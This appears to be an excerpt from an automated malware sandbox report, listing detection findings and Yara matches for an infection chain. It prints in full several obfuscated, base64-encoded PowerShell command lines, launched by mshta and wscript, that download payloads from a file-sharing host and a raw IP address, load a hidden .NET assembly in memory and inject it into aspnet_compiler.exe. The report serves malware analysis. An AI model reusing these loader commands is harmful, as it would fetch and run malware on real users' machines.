Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'\|'))"			Jump to behavior

PowerShell case anomaly found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'\|'))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'\|'))"	Jump to behavior

Yara detected aPLib compressed binary

Source: Yara match	File source: 9.2.powershell.exe.660c250.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 3092, type: MEMORYSTR

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline"
